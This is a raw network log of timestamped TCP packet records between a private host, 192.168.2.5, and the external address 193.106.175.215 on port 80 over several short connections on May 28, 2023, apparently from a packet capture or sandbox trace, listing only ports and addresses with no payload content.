May 28, 2023 09:29:42.004375935 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004398108 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004400015 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004429102 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004436016 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004451990 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004456997 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004477978 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004478931 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004503012 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004513979 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004528999 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004534960 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004554033 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004555941 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004576921 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004578114 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004604101 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004614115 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004631042 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004635096 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004654884 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004657984 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004678965 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004687071 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004698038 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004710913 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004719019 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004739046 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004740953 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004759073 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004777908 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004779100 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004796982 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004810095 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004817009 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004837036 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004842043 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004857063 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004875898 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004879951 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004894972 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004905939 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004914999 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004935980 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004940987 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004956007 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004971027 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004978895 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004991055 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005006075 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005012035 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005033016 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005043983 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005053043 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005074024 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005078077 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005094051 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005104065 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005112886 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005134106 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005145073 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005152941 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005172968 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005179882 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005192995 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005204916 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005213976 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005234957 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005244017 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005255938 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005275011 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005280018 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005295992 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005305052 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005316019 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005335093 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005342960 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005354881 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005376101 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005378008 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005395889 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005404949 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005415916 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005434990 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005440950 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005455971 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005475044 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005481958 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005496025 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005506992 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005516052 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005536079 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005546093 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005556107 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005577087 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005583048 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005598068 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005609035 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005618095 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005636930 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005645037 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005659103 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005686045 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005698919 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005718946 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005718946 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005740881 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005758047 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005759954 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005779982 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005794048 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005800009 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005820990 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005836010 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005840063 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005861044 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005875111 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005881071 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005899906 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005904913 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005919933 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005930901 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005940914 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005959988 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005970001 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.005980015 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.005999088 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006006956 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006020069 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006036997 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006038904 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006059885 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006061077 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006078959 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006098986 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006099939 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006119013 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006139040 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006139994 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006159067 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006165981 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006181955 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006201029 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006205082 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006221056 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006242037 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006248951 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006262064 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006274939 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006282091 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006302118 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006314039 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006323099 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006342888 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006352901 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006362915 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006383896 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006390095 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006405115 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006423950 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006424904 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006447077 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006454945 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006469011 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006488085 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006493092 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006508112 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006527901 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006532907 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006550074 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006561995 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006571054 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006592035 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006603003 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006612062 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006632090 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006640911 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006654024 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006669044 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006674051 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006694078 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006697893 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006714106 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006735086 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006738901 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006753922 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006773949 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006784916 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006793022 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006812096 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006819963 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006833076 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006844997 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006853104 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006871939 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006880999 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006891966 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006911039 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006928921 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006942034 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.006949902 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006966114 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.006973982 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.007035017 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.019721985 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.082798004 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.518450022 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.584708929 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.584803104 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.585167885 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.585295916 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.651060104 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.651134968 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.651700020 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.651776075 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.651917934 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.651952982 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.651967049 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.651992083 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.652200937 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.652255058 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.652318954 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.652359962 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.652820110 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.652874947 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.652930021 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.652945042 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.652976990 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.652993917 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.718542099 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.718682051 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.719604969 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.719628096 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.719690084 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.719717979 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.719774008 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.719818115 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.719973087 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.720036983 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.720321894 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.720386028 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.720526934 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.720580101 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.720652103 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.720712900 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.721455097 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.721537113 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.721884966 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.721957922 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.722330093 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.722392082 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.722886086 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.722951889 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.787163019 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.787338018 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.787636995 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.787662983 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.787731886 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.787775993 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.788744926 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.788773060 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.788851023 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.788892984 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.789159060 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.789222956 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.789803028 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.789889097 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.790354013 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.790436983 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.790788889 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.790854931 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.791276932 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.791344881 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.791642904 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.791671991 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.791946888 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.792145967 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.792356014 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.792459011 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.792721987 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.793171883 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.793555975 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.793677092 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.794055939 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.794091940 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.794306993 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.794465065 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.794581890 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.855123043 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.855340958 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.855638027 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.856012106 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.856034994 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.856283903 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.856339931 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.856723070 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.857048988 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.857269049 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.857389927 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.857647896 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.857884884 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.857985973 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.858103037 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.858608007 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.858963013 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.859334946 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.859718084 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.860033035 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.860105991 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.860485077 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.860843897 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.860862017 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.861277103 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.861344099 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.861468077 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.895481110 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.895603895 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.895701885 CEST	49716	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.963807106 CEST	80	49716	193.106.175.215	192.168.2.5
May 28, 2023 09:29:43.511312008 CEST	49717	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.569525003 CEST	80	49717	193.106.175.215	192.168.2.5
May 28, 2023 09:29:43.569668055 CEST	49717	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.570013046 CEST	49717	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.669612885 CEST	80	49717	193.106.175.215	192.168.2.5
May 28, 2023 09:29:43.679832935 CEST	80	49717	193.106.175.215	192.168.2.5
May 28, 2023 09:29:43.680003881 CEST	49717	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.681488037 CEST	49717	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.684026003 CEST	49718	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.737932920 CEST	80	49717	193.106.175.215	192.168.2.5
May 28, 2023 09:29:43.744455099 CEST	80	49718	193.106.175.215	192.168.2.5
May 28, 2023 09:29:43.744573116 CEST	49718	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.745273113 CEST	49718	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.815540075 CEST	80	49718	193.106.175.215	192.168.2.5
May 28, 2023 09:29:43.815572977 CEST	80	49718	193.106.175.215	192.168.2.5
May 28, 2023 09:29:43.815670967 CEST	49718	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.816206932 CEST	49718	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.820403099 CEST	49719	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.875421047 CEST	80	49718	193.106.175.215	192.168.2.5
May 28, 2023 09:29:43.879956007 CEST	80	49719	193.106.175.215	192.168.2.5
May 28, 2023 09:29:43.880100965 CEST	49719	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.881159067 CEST	49719	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.948245049 CEST	80	49719	193.106.175.215	192.168.2.5
May 28, 2023 09:29:43.948405027 CEST	49719	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:43.948555946 CEST	49719	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.008719921 CEST	80	49719	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.091572046 CEST	49720	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.148340940 CEST	80	49720	193.106.175.215	192.168.2.5
